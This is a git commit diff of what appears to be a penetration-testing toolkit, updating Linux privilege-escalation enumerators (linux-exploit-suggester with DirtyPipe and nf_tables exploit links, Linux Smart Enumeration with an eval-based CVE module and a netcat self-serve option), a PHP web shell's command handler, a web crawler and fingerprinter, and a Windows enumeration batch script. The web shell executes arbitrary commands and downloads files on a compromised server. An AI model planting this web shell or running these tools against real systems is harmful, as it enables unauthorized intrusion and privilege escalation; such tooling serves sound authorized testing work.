Project Update
This commit is contained in:
parent
a86fff1b36
commit
80abe85b85
@ -79,14 +79,15 @@ class Crawler:
|
||||
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
|
||||
|
||||
def collect_urls(self, page):
|
||||
soup = BeautifulSoup(page, "html.parser")
|
||||
if not isinstance(page, BeautifulSoup):
|
||||
page = BeautifulSoup(page, "html.parser")
|
||||
|
||||
urls = set()
|
||||
attrs = ["src","href","action"]
|
||||
tags = ["a","link","script","img","form"]
|
||||
|
||||
for tag in tags:
|
||||
for e in soup.find_all(tag):
|
||||
for e in page.find_all(tag):
|
||||
for attr in attrs:
|
||||
if e.has_attr(attr):
|
||||
urls.add(e[attr])
|
||||
|
3428
linpeas.sh
3428
linpeas.sh
File diff suppressed because one or more lines are too long
@ -1,7 +1,7 @@
|
||||
#!/bin/bash
|
||||
|
||||
#
|
||||
# Copyright (c) 2016-2020, @_mzet_
|
||||
# Copyright (c) 2016-2022, @_mzet_
|
||||
#
|
||||
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
||||
# This is free software, and you are welcome to redistribute it
|
||||
@ -930,6 +930,44 @@ author: theflow (orginal exploit author); bcoles (author of exploit update at 'e
|
||||
EOF
|
||||
)
|
||||
|
||||
EXPLOITS[((n++))]=$(cat <<EOF
|
||||
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
|
||||
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
|
||||
Tags: ubuntu=(20.04|21.04),debian=11
|
||||
Rank: 1
|
||||
analysis-url: https://dirtypipe.cm4all.com/
|
||||
src-url: https://haxx.in/files/dirtypipez.c
|
||||
exploit-db: 50808
|
||||
author: blasty (original exploit author: Max Kellermann)
|
||||
EOF
|
||||
)
|
||||
|
||||
EXPLOITS[((n++))]=$(cat <<EOF
|
||||
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
|
||||
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
|
||||
Tags: ubuntu=(20.04){kernel:5.12.13}
|
||||
Rank: 1
|
||||
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
|
||||
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
|
||||
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
|
||||
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
|
||||
EOF
|
||||
)
|
||||
|
||||
EXPLOITS[((n++))]=$(cat <<EOF
|
||||
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
|
||||
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
|
||||
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
|
||||
Rank: 1
|
||||
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
|
||||
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
|
||||
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
|
||||
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
|
||||
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
|
||||
EOF
|
||||
)
|
||||
|
||||
|
||||
############ USERSPACE EXPLOITS ###########################
|
||||
n=0
|
||||
|
||||
@ -1769,7 +1807,7 @@ EOF
|
||||
FEATURES[((n++))]=$(cat <<EOF
|
||||
feature: Syscalls filtering
|
||||
available: CONFIG_SECCOMP=y
|
||||
enabled: cmd:grep -i Seccomp /proc/self/status | awk '{print \$2}'
|
||||
enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
|
||||
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
|
||||
EOF
|
||||
)
|
||||
@ -2168,7 +2206,7 @@ for FEATURE in "${FEATURES[@]}"; do
|
||||
feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)
|
||||
|
||||
if [ -n "$cmdStdout" ]; then
|
||||
if [ "$cmdStdout" -eq 0 ]; then
|
||||
if [ $cmdStdout -eq 0 ]; then
|
||||
state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
|
||||
cmdStdout=""
|
||||
else
|
||||
@ -2189,7 +2227,7 @@ for FEATURE in "${FEATURES[@]}"; do
|
||||
enabled="[ ${txtred}Exposed${txtrst} ]"
|
||||
disabled="[ ${txtgrn}Locked${txtrst} ]"
|
||||
|
||||
#other modes" "Disabled" / "Enabled"
|
||||
# other modes" "Disabled" / "Enabled"
|
||||
else
|
||||
enabled="[ ${txtgrn}Enabled${txtrst} ]"
|
||||
disabled="[ ${txtred}Disabled${txtrst} ]"
|
||||
|
287
lse.sh
287
lse.sh
@ -1,15 +1,15 @@
|
||||
#!/bin/sh
|
||||
# shellcheck disable=1003,1091,2006,2016,2034,2039
|
||||
# vim: set ts=2 sw=2 sts=2 et:
|
||||
# shellcheck disable=1003,1091,2006,2016,2034,2039,3043
|
||||
# vim: set ts=2 sw=2 sts=2 fdm=marker fmr=#(,#) et:
|
||||
|
||||
# Author: Diego Blanco <diego.blanco@treitos.com>
|
||||
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
||||
#
|
||||
lse_version="3.10"
|
||||
lse_version="4.10nw"
|
||||
|
||||
#( Colors
|
||||
##( Colors
|
||||
#
|
||||
# fg
|
||||
#( fg
|
||||
red='\e[31m'
|
||||
lred='\e[91m'
|
||||
green='\e[32m'
|
||||
@ -26,8 +26,8 @@ grey='\e[90m'
|
||||
lgrey='\e[37m'
|
||||
white='\e[97m'
|
||||
black='\e[30m'
|
||||
#
|
||||
# bg
|
||||
##)
|
||||
#( bg
|
||||
b_red='\e[41m'
|
||||
b_lred='\e[101m'
|
||||
b_green='\e[42m'
|
||||
@ -44,8 +44,8 @@ b_grey='\e[100m'
|
||||
b_lgrey='\e[47m'
|
||||
b_white='\e[107m'
|
||||
b_black='\e[40m'
|
||||
#
|
||||
# special
|
||||
##)
|
||||
#( special
|
||||
reset='\e[0;0m'
|
||||
bold='\e[01m'
|
||||
italic='\e[03m'
|
||||
@ -59,13 +59,13 @@ underline_off='\e[24m'
|
||||
inverse_off='\e[27m'
|
||||
conceil_off='\e[28m'
|
||||
crossedout_off='\e[29m'
|
||||
##)
|
||||
#)
|
||||
|
||||
#( Globals
|
||||
##( Globals
|
||||
#
|
||||
# user
|
||||
lse_user_id="$UID"
|
||||
[ -z "$lse_user_id" ] && lse_user_id="`id -u`"
|
||||
lse_user_id="`id -u`"
|
||||
lse_user="$USER"
|
||||
[ -z "$lse_user" ] && lse_user="`id -nu`"
|
||||
lse_pass=""
|
||||
@ -77,7 +77,8 @@ lse_arch="`uname -m`"
|
||||
lse_linux="`uname -r`"
|
||||
lse_hostname="`hostname`"
|
||||
lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null`
|
||||
[ -z "$lse_distro" ] && lse_distro="`(source /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
|
||||
[ -z "$lse_distro" ] && lse_distro="`(. /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
|
||||
lse_distro_codename="" # retrieved below with lse_get_distro_codename
|
||||
|
||||
# lse
|
||||
lse_passed_tests=""
|
||||
@ -85,11 +86,12 @@ lse_executed_tests=""
|
||||
lse_DEBUG=false
|
||||
lse_procmon_data=`mktemp`
|
||||
lse_procmon_lock=`mktemp`
|
||||
lse_cve_tmp=''
|
||||
|
||||
# printf
|
||||
printf "%s" "$reset" | grep -q '\\' && alias printf="env printf"
|
||||
|
||||
# internal data
|
||||
#( internal data
|
||||
lse_common_setuid="
|
||||
/bin/fusermount
|
||||
/bin/mount
|
||||
@ -176,12 +178,14 @@ lse_common_setuid="
|
||||
/usr/sbin/usernetctl
|
||||
/usr/sbin/uuidd
|
||||
"
|
||||
#regex rules for common setuid
|
||||
#)
|
||||
#( regex rules for common setuid
|
||||
lse_common_setuid="$lse_common_setuid
|
||||
/snap/core.*
|
||||
/var/tmp/mkinitramfs.*
|
||||
"
|
||||
#critical writable files
|
||||
#)
|
||||
#( critical writable files
|
||||
lse_critical_writable="
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/httpd.conf
|
||||
@ -235,8 +239,13 @@ lse_critical_writable_dirs="
|
||||
/root
|
||||
"
|
||||
#)
|
||||
#( CVE list (populated by the lse packager)
|
||||
lse_cve_list="
|
||||
" #CVElistMARKER
|
||||
#)
|
||||
#)
|
||||
|
||||
#( Options
|
||||
##( Options
|
||||
lse_color=true
|
||||
lse_alt_color=false
|
||||
lse_interactive=true
|
||||
@ -247,16 +256,16 @@ lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o'
|
||||
lse_grep_opts='--color=always'
|
||||
#)
|
||||
|
||||
#( Lib
|
||||
cecho() {
|
||||
##( Lib
|
||||
cecho() { #(
|
||||
if $lse_color; then
|
||||
printf "%b" "$@"
|
||||
else
|
||||
# If color is disabled we remove it
|
||||
printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g'
|
||||
fi
|
||||
}
|
||||
lse_recolor() {
|
||||
} #)
|
||||
lse_recolor() { #(
|
||||
o_white="$white"
|
||||
o_lyellow="$lyellow"
|
||||
o_grey="$grey"
|
||||
@ -270,11 +279,11 @@ lse_recolor() {
|
||||
lred="$red"
|
||||
lgreen="$b_lgreen$black"
|
||||
lcyan="$cyan"
|
||||
}
|
||||
lse_error() {
|
||||
} #)
|
||||
lse_error() { #(
|
||||
cecho "${red}ERROR: ${reset}$*\n" >&2
|
||||
}
|
||||
lse_exclude_paths() {
|
||||
} #)
|
||||
lse_exclude_paths() { #(
|
||||
local IFS="
|
||||
"
|
||||
for p in `printf "%s" "$1" | tr ',' '\n'`; do
|
||||
@ -282,8 +291,8 @@ lse_exclude_paths() {
|
||||
p="${p%%/}"
|
||||
lse_find_opts="$lse_find_opts -path ${p} -prune -o"
|
||||
done
|
||||
}
|
||||
lse_set_level() {
|
||||
} #)
|
||||
lse_set_level() { #(
|
||||
case "$1" in
|
||||
0|1|2)
|
||||
lse_level=$(($1))
|
||||
@ -293,8 +302,8 @@ lse_set_level() {
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
lse_help() {
|
||||
} #)
|
||||
lse_help() { #(
|
||||
echo "Use: $0 [options]"
|
||||
echo
|
||||
echo " OPTIONS"
|
||||
@ -319,6 +328,7 @@ lse_help() {
|
||||
echo " pro: Processes related tests."
|
||||
echo " sof: Software related tests."
|
||||
echo " ctn: Container (docker, lxc) related tests."
|
||||
echo " cve: CVE related tests."
|
||||
echo " Specific tests can be used with their IDs (i.e.: usr020,sud)"
|
||||
echo " -e PATHS Comma separated list of paths to exclude. This allows you"
|
||||
echo " to do faster scans at the cost of completeness"
|
||||
@ -326,8 +336,8 @@ lse_help() {
|
||||
echo " processes. A value of 0 will disable any watch (default: 60)"
|
||||
echo " -S Serve the lse.sh script in this host so it can be retrieved"
|
||||
echo " from a remote host."
|
||||
}
|
||||
lse_ask() {
|
||||
} #)
|
||||
lse_ask() { #(
|
||||
local question="$1"
|
||||
# We use stderr to print the question
|
||||
cecho "${white}${question}: ${reset}" >&2
|
||||
@ -341,24 +351,24 @@ lse_ask() {
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
lse_request_information() {
|
||||
} #)
|
||||
lse_request_information() { #(
|
||||
if $lse_interactive; then
|
||||
cecho "${grey}---\n"
|
||||
[ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"`
|
||||
lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"`
|
||||
cecho "${grey}---\n"
|
||||
fi
|
||||
}
|
||||
lse_test_passed() {
|
||||
} #)
|
||||
lse_test_passed() { #(
|
||||
# Checks if a test passed by ID
|
||||
local id="$1"
|
||||
for i in $lse_passed_tests; do
|
||||
[ "$i" = "$id" ] && return 0
|
||||
done
|
||||
return 1
|
||||
}
|
||||
lse_test() {
|
||||
} #)
|
||||
lse_test() { #(
|
||||
# Test id
|
||||
local id="$1"
|
||||
# Minimum level required for this test to show its output
|
||||
@ -394,8 +404,8 @@ lse_test() {
|
||||
|
||||
# Print name and line
|
||||
cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}"
|
||||
for i in $(seq $((${#name}+4)) 67); do
|
||||
echo -n "."
|
||||
for i in $(seq $((${#id}+${#name}+10)) 79); do
|
||||
printf "."
|
||||
done
|
||||
|
||||
# Check dependencies
|
||||
@ -445,8 +455,8 @@ lse_test() {
|
||||
fi
|
||||
return 0
|
||||
fi
|
||||
}
|
||||
lse_show_info() {
|
||||
} #)
|
||||
lse_show_info() { #(
|
||||
echo
|
||||
cecho "${lcyan} LSE Version:${reset} $lse_version\n"
|
||||
echo
|
||||
@ -470,12 +480,14 @@ lse_show_info() {
|
||||
fi
|
||||
cecho "${lblue}Architecture:${reset} $lse_arch\n"
|
||||
echo
|
||||
}
|
||||
lse_serve() {
|
||||
cecho "${green}=====================(${yellow} Current Output Verbosity Level: ${cyan}$lse_level ${green})======================${reset}"
|
||||
echo
|
||||
} #)
|
||||
lse_serve() { #(
|
||||
# get port
|
||||
which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
|
||||
|
||||
local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`"
|
||||
local_ips="`ip a | grep -Eo "inet ([0-9]{1,3}\.){3}[0-9]{1,3}" | cut -d' ' -f2`"
|
||||
|
||||
# Get a valid and non used port
|
||||
port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
|
||||
@ -506,8 +518,8 @@ lse_serve() {
|
||||
done
|
||||
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
|
||||
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
|
||||
}
|
||||
lse_header() {
|
||||
} #)
|
||||
lse_header() { #(
|
||||
local id="$1"
|
||||
shift
|
||||
local title="$*"
|
||||
@ -530,8 +542,8 @@ lse_header() {
|
||||
done
|
||||
text="$text(${green} $title ${magenta})====="
|
||||
cecho "$text${reset}\n"
|
||||
}
|
||||
lse_exit() {
|
||||
} #)
|
||||
lse_exit() { #(
|
||||
local ec=1
|
||||
local text="\n${magenta}=================================="
|
||||
[ "$1" ] && ec=$1
|
||||
@ -539,18 +551,32 @@ lse_exit() {
|
||||
cecho "$text${reset}\n"
|
||||
rm -f "$lse_procmon_data"
|
||||
rm -f "$lse_procmon_lock"
|
||||
rm -f "$lse_cve_tmp"
|
||||
exit "$ec"
|
||||
}
|
||||
lse_procmon() {
|
||||
} #)
|
||||
lse_procmon() { #(
|
||||
# monitor processes
|
||||
#NOTE: The first number will be the number of occurrences of a process due to
|
||||
# uniq -c
|
||||
local ps_args
|
||||
local ps_busybox
|
||||
if ps -V 2>&1 | grep -iq busybox; then
|
||||
ps_args='-o pid,user,args'
|
||||
ps_busybox=true
|
||||
else
|
||||
ps_args="-ewwwo start_time,pid,user:50,args"
|
||||
ps_busybox=false
|
||||
fi
|
||||
while [ -f "$lse_procmon_lock" ]; do
|
||||
ps -ewwwo start_time,pid,user:50,args
|
||||
if $ps_busybox; then
|
||||
ps $ps_args | sed 's/^\([0-9]*\)/? \1 /g'
|
||||
else
|
||||
ps $ps_args
|
||||
fi
|
||||
sleep 0.001
|
||||
done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
|
||||
}
|
||||
lse_proc_print() {
|
||||
done | grep -Ev "(pid,user|$lse_user *sed s/)" | sed 's/^ *//g' | tr -s '[:space:]' | grep -Ev "PID *USER *COMMAND" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
|
||||
} #)
|
||||
lse_proc_print() { #(
|
||||
# Pretty prints output from lse_procmom received via stdin
|
||||
if $lse_color; then
|
||||
printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND"
|
||||
@ -574,7 +600,57 @@ lse_proc_print() {
|
||||
printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args"
|
||||
fi
|
||||
done
|
||||
}
|
||||
} #)
|
||||
lse_get_distro_codename() { #(
|
||||
# Get the distribution name
|
||||
#
|
||||
# ubuntu, debian, centos, redhat, opsuse, fedora, rocky
|
||||
local distro="${grey}unknown${reset}"
|
||||
if type lsb_release >/dev/null 2>&1; then
|
||||
distro=`lsb_release -is`
|
||||
elif [ -f /etc/os-release ]; then
|
||||
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
|
||||
echo "$distro" | grep -qi opensuse && distro=opsuse
|
||||
elif [ -f /etc/redhat-release ]; then
|
||||
grep -qi "centos" /etc/redhat-release && distro=centos
|
||||
grep -qi "fedora" /etc/redhat-release && distro=fedora
|
||||
grep -qi "red hat" /etc/redhat-release && distro=redhat
|
||||
grep -qi "rocky" /etc/redhat-release && distro=rocky
|
||||
fi
|
||||
printf '%s' "$distro" | tr '[:upper:]' '[:lower:]' | tr -d \"\'
|
||||
} #)
|
||||
lse_is_version_bigger() { #(
|
||||
# check if version v1 is bigger than v2
|
||||
local v1="$1"; local v2="$2" ; local vc
|
||||
[ "$v1" = "$v2" ] && return 1 # equal is not bigger
|
||||
vc="`printf "%s\n%s\n" "$v1" "$v2" | sort -rV | head -n1`"
|
||||
[ "$v1" = "$vc" ] && return 0
|
||||
return 1
|
||||
} #)
|
||||
lse_get_pkg_version() { #(
|
||||
# get package version depending on distro
|
||||
# returns 2 if distro is unknown
|
||||
# returns 1 if package is not installed (or doesn't exist)
|
||||
# returns 0 on success, and prints out the package version
|
||||
pkg_name="$1"
|
||||
case "$lse_distro_codename" in
|
||||
debian|ubuntu)
|
||||
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
|
||||
;;
|
||||
centos|redhat|fedora|opsuse|rocky|amzn)
|
||||
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
|
||||
pkg_version="${pkg_version##"$pkg_name"-}"
|
||||
pkg_version=`echo "$pkg_version" | sed -E 's/\.(aarch64|armv7hl|i686|noarch|ppc64le|s390x|x86_64)$//'`
|
||||
;;
|
||||
*)
|
||||
return 2
|
||||
;;
|
||||
esac
|
||||
[ -z "$pkg_version" ] && return 1
|
||||
printf "%s" "$pkg_version"
|
||||
return 0
|
||||
} #)
|
||||
#)
|
||||
#)
|
||||
|
||||
########################################################################( TESTS
|
||||
@ -638,7 +714,7 @@ lse_run_tests_users() {
|
||||
'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \
|
||||
"usr070"
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
#########################################################################( sudo
|
||||
lse_run_tests_sudo() {
|
||||
@ -688,7 +764,7 @@ lse_run_tests_sudo() {
|
||||
"Do we know if any other users used sudo?" \
|
||||
'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
##################################################################( file system
|
||||
lse_run_tests_filesystem() {
|
||||
@ -851,7 +927,7 @@ lse_run_tests_filesystem() {
|
||||
"Dump fstab file" \
|
||||
'cat /etc/fstab'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
#######################################################################( system
|
||||
lse_run_tests_system() {
|
||||
@ -907,7 +983,7 @@ lse_run_tests_system() {
|
||||
"System password policies in /etc/login.defs" \
|
||||
'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
#####################################################################( security
|
||||
lse_run_tests_security() {
|
||||
@ -953,7 +1029,7 @@ lse_run_tests_security() {
|
||||
"Can we read the auditd log?" \
|
||||
'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
##############################################################( recurrent tasks
|
||||
lse_run_tests_recurrent_tasks() {
|
||||
@ -1021,7 +1097,7 @@ lse_run_tests_recurrent_tasks() {
|
||||
"Systemd timers" \
|
||||
'systemctl list-timers --all'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
######################################################################( network
|
||||
lse_run_tests_network() {
|
||||
@ -1072,7 +1148,7 @@ lse_run_tests_network() {
|
||||
"Listening UDP" \
|
||||
'netstat -unlp || ss -unlp'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
#####################################################################( services
|
||||
lse_run_tests_services() {
|
||||
@ -1167,7 +1243,7 @@ lse_run_tests_services() {
|
||||
"Systemd config files permissions" \
|
||||
'ls -lthR /lib/systemd/ /etc/systemd/'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
#####################################################################( software
|
||||
lse_run_tests_software() {
|
||||
@ -1310,7 +1386,7 @@ lse_run_tests_software() {
|
||||
'screen -v'
|
||||
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
###################################################################( containers
|
||||
lse_run_tests_containers() {
|
||||
@ -1341,7 +1417,7 @@ lse_run_tests_containers() {
|
||||
"Is the user a member of any lxc/lxd group?" \
|
||||
'groups | grep $lse_grep_opts "lxc\|lxd"'
|
||||
}
|
||||
|
||||
#)
|
||||
|
||||
####################################################################( processes
|
||||
lse_run_tests_processes() {
|
||||
@ -1398,11 +1474,35 @@ lse_run_tests_processes() {
|
||||
'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \
|
||||
"pro001"
|
||||
}
|
||||
#)
|
||||
|
||||
#########################################################################( CVEs
|
||||
lse_run_tests_cves() {
|
||||
lse_header "cve" "CVEs"
|
||||
if [ "${#lse_cve_list}" = 1 ]; then
|
||||
if [ -z "$lse_selection" ] || printf "%s" "$lse_selection" | grep -iq 'cve'; then
|
||||
printf "%s\n%s\n%s" \
|
||||
" In order to test for CVEs, download lse.sh from the GitHub releases page." \
|
||||
" Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the" \
|
||||
" repository."
|
||||
fi
|
||||
else
|
||||
for lse_cve in $lse_cve_list; do
|
||||
eval "$(printf '%s' "$lse_cve" | base64 -d | gunzip -c)"
|
||||
|
||||
lse_test "$lse_cve_id" "$lse_cve_level" \
|
||||
"$lse_cve_description" \
|
||||
"lse_cve_test"
|
||||
done
|
||||
fi
|
||||
}
|
||||
#)
|
||||
#
|
||||
##)
|
||||
|
||||
#( Main
|
||||
while getopts "hcCil:e:p:s:S" option; do
|
||||
main() {
|
||||
while getopts "hcCil:e:p:s:S" option; do
|
||||
case "${option}" in
|
||||
c) lse_color=false; lse_grep_opts='--color=never';;
|
||||
C) lse_alt_color=true;;
|
||||
@ -1415,32 +1515,43 @@ while getopts "hcCil:e:p:s:S" option; do
|
||||
h) lse_help; exit 0;;
|
||||
*) lse_help; exit 1;;
|
||||
esac
|
||||
done
|
||||
done
|
||||
|
||||
#trap to exec on SIGINT
|
||||
trap "lse_exit 1" 2
|
||||
#trap to exec on SIGINT
|
||||
trap "lse_exit 1" 2
|
||||
|
||||
# use alternative color scheme
|
||||
$lse_alt_color && lse_recolor
|
||||
# use alternative color scheme
|
||||
$lse_alt_color && lse_recolor
|
||||
|
||||
lse_request_information
|
||||
lse_show_info
|
||||
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
|
||||
lse_request_information
|
||||
lse_show_info
|
||||
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
|
||||
lse_distro_codename=`lse_get_distro_codename`
|
||||
|
||||
lse_procmon &
|
||||
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
|
||||
lse_procmon &
|
||||
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
|
||||
|
||||
lse_run_tests_users
|
||||
lse_run_tests_sudo
|
||||
lse_run_tests_filesystem
|
||||
lse_run_tests_system
|
||||
lse_run_tests_security
|
||||
lse_run_tests_recurrent_tasks
|
||||
lse_run_tests_network
|
||||
lse_run_tests_services
|
||||
lse_run_tests_software
|
||||
lse_run_tests_containers
|
||||
lse_run_tests_processes
|
||||
## NO WAR
|
||||
lse_header "nowar" "humanity"
|
||||
lse_test "nowar0" "0" \
|
||||
'Should we question autocrats and their "military operations"?' \
|
||||
'cecho " $black$b_blue NO $reset\n $black$b_yellow WAR $reset"'
|
||||
|
||||
lse_exit 0
|
||||
lse_run_tests_users
|
||||
lse_run_tests_sudo
|
||||
lse_run_tests_filesystem
|
||||
lse_run_tests_system
|
||||
lse_run_tests_security
|
||||
lse_run_tests_recurrent_tasks
|
||||
lse_run_tests_network
|
||||
lse_run_tests_services
|
||||
lse_run_tests_software
|
||||
lse_run_tests_containers
|
||||
lse_run_tests_processes
|
||||
lse_run_tests_cves
|
||||
|
||||
lse_exit 0
|
||||
}
|
||||
|
||||
[ ! "$lse_NO_EXEC" ] && main "$@"
|
||||
#)
|
||||
|
@ -1,14 +1,22 @@
|
||||
<?php
|
||||
|
||||
function expandPath($path) {
|
||||
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
||||
exec("echo $match[1]", $stdout);
|
||||
return $stdout[0] . $match[2];
|
||||
}
|
||||
return $path;
|
||||
}
|
||||
|
||||
function featureShell($cmd, $cwd) {
|
||||
$stdout = array();
|
||||
|
||||
if (preg_match("/^\s*cd\s*$/", $cmd)) {
|
||||
// pass
|
||||
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
||||
chdir(expandPath("~"));
|
||||
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
|
||||
chdir($cwd);
|
||||
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||
chdir($match[1]);
|
||||
chdir(expandPath($match[1]));
|
||||
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
|
||||
chdir($cwd);
|
||||
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||
|
@ -8,6 +8,7 @@ import requests
|
||||
import urllib.parse
|
||||
import util
|
||||
from bs4 import BeautifulSoup
|
||||
from crawl_urls import Crawler
|
||||
|
||||
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
@ -208,7 +209,7 @@ class WebServiceFinder:
|
||||
litecart_pattern = re.compile(r"^https://www.litecart.net")
|
||||
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
|
||||
|
||||
urls = util.collectUrls(soup)
|
||||
urls = Crawler(self.url).collect_urls(soup)
|
||||
for url in urls:
|
||||
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
|
||||
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))
|
||||
|
Binary file not shown.
Binary file not shown.
@ -55,7 +55,7 @@ ECHO.
|
||||
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
|
||||
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
|
||||
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
|
||||
systeminfo
|
||||
ECHO.
|
||||
CALL :T_Progress 2
|
||||
@ -174,7 +174,7 @@ CALL :T_Progress 1
|
||||
:UACSettings
|
||||
CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
|
||||
ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
|
||||
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
|
||||
ECHO.
|
||||
CALL :T_Progress 1
|
||||
@ -225,7 +225,7 @@ CALL :T_Progress 1
|
||||
:InstalledSoftware
|
||||
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
|
||||
ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
|
||||
ECHO.
|
||||
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
|
||||
